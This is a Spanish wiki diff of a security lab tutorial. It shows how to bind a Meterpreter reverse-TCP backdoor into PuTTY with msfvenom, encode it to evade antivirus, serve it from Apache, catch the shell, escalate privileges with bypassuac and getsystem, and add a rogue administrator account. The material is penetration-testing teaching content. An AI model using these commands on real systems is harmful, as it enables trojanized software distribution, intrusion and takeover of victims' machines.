Herramientas de usuario

Herramientas del sitio


sad:t2:m3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión
Revisión previa
sad:t2:m3 [2018/11/21 18:20]
José Manuel Guallar
sad:t2:m3 [2019/12/04 18:45] (actual)
José Manuel Guallar
Línea 1: Línea 1:
 ====== Metasploit 3 ====== ====== Metasploit 3 ======
-¿Cuál es el escenario?+** Escenario**
  
 ¿Has oido hablar alguna vez de que alguien colocó un virus o una puerta trasera en un juego o en una utilidad?, La pena, es muy facil hacerlo. La siguiente práctica de laboratorio muestra cómo usar msfpayload para crear la puerta trasera y msfencode para (1) vincular la puerta trasera a Putty.exe (o un juego) y (2) posiblemente evadir la detección de virus. ¿Has oido hablar alguna vez de que alguien colocó un virus o una puerta trasera en un juego o en una utilidad?, La pena, es muy facil hacerlo. La siguiente práctica de laboratorio muestra cómo usar msfpayload para crear la puerta trasera y msfencode para (1) vincular la puerta trasera a Putty.exe (o un juego) y (2) posiblemente evadir la detección de virus.
  
 +**¿Qué es Metasploit?​**
  
-¿Qué ​es Metasploit?+Metasploit Framework ​es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, ​Metasploit ​se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos.
  
-    Metasploit Framework ​es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, Metasploit se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos.+** ¿Qué ​es msfvenom?**
  
 +Es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación. Tambien modifica el codigo cualquier programa.
  
-¿Qué es mfspayload? 
  
-msfpayload ​es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación.+**¿Qué ​es PuTTy?**
  
 +PuTTY es un emulador de terminal gratuito, de código abierto, para la transferencia de archivos de red. Admite varios protocolos de red, incluidos SCP, SSH, Telnet, rlogin y conexión de socket sin formato. También puede conectarse a un puerto serie (desde la versión 0.59). ​
  
-¿Qué es msfencode? 
  
-msfencode es otra gran herramienta que el que modifica el codigo cualquier programa. +**Requisitos previos**
- +
- +
-¿Qué es Putty? +
- +
-    PuTTY es un emulador de terminal gratuito, de código abierto, para la transferencia de archivos de red. Admite varios protocolos de red, incluidos SCP, SSH, Telnet, rlogin y conexión de socket sin formato. También puede conectarse a un puerto serie (desde la versión 0.59).  +
- +
- +
-Requisitos previos+
  
   * Tener instalado Kali   * Tener instalado Kali
   * Tener un  Windows 7   * Tener un  Windows 7
  
-  +** En esta practica ​ haremos lo siguiente**:
-En esta practica ​ haremos lo siguiente:+
   * Descargar Putty.exe   * Descargar Putty.exe
   * Crear puerta trasera con msfpayload   * Crear puerta trasera con msfpayload
Línea 41: Línea 33:
  
 {{:​sad:​t2:​m3:​01.png?​600|}} {{:​sad:​t2:​m3:​01.png?​600|}}
 +
 +Iniciamos el apache
 +
 +<​code>​
 +    cd /etc/init.d
 +    ./apache2 start
 +    ps -eaf | grep -v grep | grep apache
 +</​code>​
 +
 {{:​sad:​t2:​m3:​02.png?​600|}} {{:​sad:​t2:​m3:​02.png?​600|}}
  
-[[http://​www.aula51.ovh/​putty/​putty.exe|putty]]+<​code>​ 
 +    cd /var/www 
 +    wget http://​www.aula51.ovh/​putty/​putty.exe 
 +    ls -l putty.exe 
 +</​code>​ 
 + 
 +Descarga el PuTTy desde este enalce ​[[http://​www.aula51.ovh/​putty/​putty.exe|putty]]
  
 {{:​sad:​t2:​m3:​03.png?​600|}} {{:​sad:​t2:​m3:​03.png?​600|}}
-{{:​sad:​t2:​m3:​04.png?600|}}+ 
 +<​code>​ 
 +cp putty.exe /​usr/​share/​metasploit-framework/​data/​templates/​ 
 +msfvenom -p windows/​meterpreter/​reverse_tcp LHOST=<​ip_del_kali>​ LPORT=4444 -x putty.exe -e x86/​shikata_ga_nai -i 3 -k -f exe > bad_putty.exe 
 +chmod 744 /​var/​www/​bad_putty.exe 
 +ls -lrta | grep putty 
 +</​code>​ 
 + 
 +El comando 1, ejecutables,​ como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode. 
 + 
 +El comando 2, crea una puerta trasera reverse_tcp usando msfvenom para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa para enlazar la puerta trasera en putty.exe. Se utilizan 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para  evitar el antivirus de la máquina. 
 + 
 +Comando 3, hace ejecutable bad_putty. 
 +     
 + 
 +{{:​sad:​t2:​m3:​4_1.png?600|}} 
 +<​code>​ 
 +script msfconsole_putty.txt 
 +</​code>​ 
 + 
 +Hace un texto completo de la sesión terminal. Básicamente toda la entrada y la salida serán almacenadas en el archivo msfconsole_putty.txt.  
 {{:​sad:​t2:​m3:​05.png?​600|}} {{:​sad:​t2:​m3:​05.png?​600|}}
 +
 +<​code>​
 +msfconsole
 +</​code>​
 +
 {{:​sad:​t2:​m3:​06.png?​600|}} {{:​sad:​t2:​m3:​06.png?​600|}}
 +<​code>​
 +use exploit/​multi/​handler ​
 +set PAYLOAD windows/​meterpreter/​reverse_tcp ​
 +set LHOST <​ip_del_kali>​
 +set LPORT 4444 
 +exploit
 +</​code> ​
 {{:​sad:​t2:​m3:​07.png?​600|}} {{:​sad:​t2:​m3:​07.png?​600|}}
 +
 +Vamos al Windows 7, abrimos un explorador y escribimos la ip del kali
 +
 +<​code>​
 +http://​ip_del_Kali/​bad_putty.exe
 +</​code>​
 +
 +
 {{:​sad:​t2:​m3:​08.png?​600|}} {{:​sad:​t2:​m3:​08.png?​600|}}
 +
 +Ejecutamos el bad_putty
 +
 {{:​sad:​t2:​m3:​09.png?​600|}} {{:​sad:​t2:​m3:​09.png?​600|}}
 +Volvemos a la maquina virtual del Kali y se observa que el Meterpreter se ha actiado entre el Kali y el Windows vulnerable
 +
 {{:​sad:​t2:​m3:​10.png?​600|}} {{:​sad:​t2:​m3:​10.png?​600|}}
 +
 +
 +
 +
 {{:​sad:​t2:​m3:​11.png?​600|}} {{:​sad:​t2:​m3:​11.png?​600|}}
 +<​code>​
 +sysinfo
 +</​code>​
 +
 +
 {{:​sad:​t2:​m3:​12.png?​600|}} {{:​sad:​t2:​m3:​12.png?​600|}}
 +para saber el nombre de usuario escribimos ​
 +<​code>​
 +getuid
 +</​code>​
 {{:​sad:​t2:​m3:​13.png?​600|}} {{:​sad:​t2:​m3:​13.png?​600|}}
 +
 +<​code>​
 +shell
 +echo %username%
 +</​code>​
 +
 {{:​sad:​t2:​m3:​14.png?​600|}} {{:​sad:​t2:​m3:​14.png?​600|}}
 +
 +<​code>​
 +net users
 +</​code>​
 +
 {{:​sad:​t2:​m3:​15.png?​600|}} {{:​sad:​t2:​m3:​15.png?​600|}}
 +
 +<​code>​
 +net users student
 +</​code>​
 +Para poder ver con detalle la cuenta estudiante. se observa que es parte del grupo de administradores
 +
 {{:​sad:​t2:​m3:​16.png?​600|}} {{:​sad:​t2:​m3:​16.png?​600|}}
 +
 +<​code>​
 +net users nombre_hacker abc123 /ADD /​FULLNAME:"​Tu nombre"​
 +Observamos que nos pone Access denied.
 +exit
 +</​code>​
 +
 {{:​sad:​t2:​m3:​17.png?​600|}} {{:​sad:​t2:​m3:​17.png?​600|}}
 +<​code>​
 +background
 +sessions -l
 +</​code>​
 +comando 1 volvemos a la consola de Metasploit sin terminar la sesión
 +
 +comando 2 podemos ver todas las sesiones establecidas. Es un l de leon
 +
 {{:​sad:​t2:​m3:​18.png?​600|}} {{:​sad:​t2:​m3:​18.png?​600|}}
 +<​code>​
 +use exploit/​windows/​local/​bypassuac
 +show options
 +set SESSION 1
 +"​1"​ es el numero 1.
 +exploit
 +</​code>​
 +
 +comando 1 es un modulo de post-explosión que incrementa el control de la cuenta de usuario
 +
 {{:​sad:​t2:​m3:​19.png?​600|}} {{:​sad:​t2:​m3:​19.png?​600|}}
 +
 +
 +
 {{:​sad:​t2:​m3:​20.png?​600|}} {{:​sad:​t2:​m3:​20.png?​600|}}
 +
 +<​code>​
 +getuid
 +getsystem
 +getuid
 +</​code>​
 +
 +comando 1 proporciona el nombre de usuario "​estudiante"​
 +
 +comando 2 permite poner la cuenta de usuario como cuenta de administrador
 +
 +comando 3 el usuario ya es administrador privilegiado
 +
 {{:​sad:​t2:​m3:​21.png?​600|}} {{:​sad:​t2:​m3:​21.png?​600|}}
 +
 +<​code>​
 +shell
 +net users nombre_hacker abc123 /ADD /​FULLNAME:"​YOUR NAME"
 +reemplaza nombre_hacker por tu nombre
 +net localgroup Administrators nombre_hacker /ADD
 +net localgroup Administrators
 +</​code>​
 +
 +Se crea nombre_hacker con su contraseña
 +Muestra que usuarios pertenecen al grupo de Administradores. hombre_hacker pertenece ahora al grupo
 +
 {{:​sad:​t2:​m3:​22.png?​600|}} {{:​sad:​t2:​m3:​22.png?​600|}}
 +
 +Se sale del Meterpreter al sistema
 +
 {{:​sad:​t2:​m3:​23.png?​600|}} {{:​sad:​t2:​m3:​23.png?​600|}}
 +<​code>​
 +net users nombre_hacker
 +</​code>​
 +
 +Muestra los detalles de nombre_hacker
 {{:​sad:​t2:​m3:​24.png?​600|}} {{:​sad:​t2:​m3:​24.png?​600|}}
 {{:​sad:​t2:​m3:​25.png?​600|}} {{:​sad:​t2:​m3:​25.png?​600|}}
 +
 +Establecemos una sesión remota con el Windows 7
 +
 {{:​sad:​t2:​m3:​26.png?​600|}} {{:​sad:​t2:​m3:​26.png?​600|}}
 +<​code>​
 +cd /var/www
 +strings msfconsole_putty.txt | grep "​Meterpreter session 2"
 +strings msfconsole_putty.txt | grep "Full Name"
 +date
 +echo "tu nombre"​
 +</​code>​
sad/t2/m3.1542824413.txt.gz · Última modificación: 2019/01/04 13:18 (editor externo)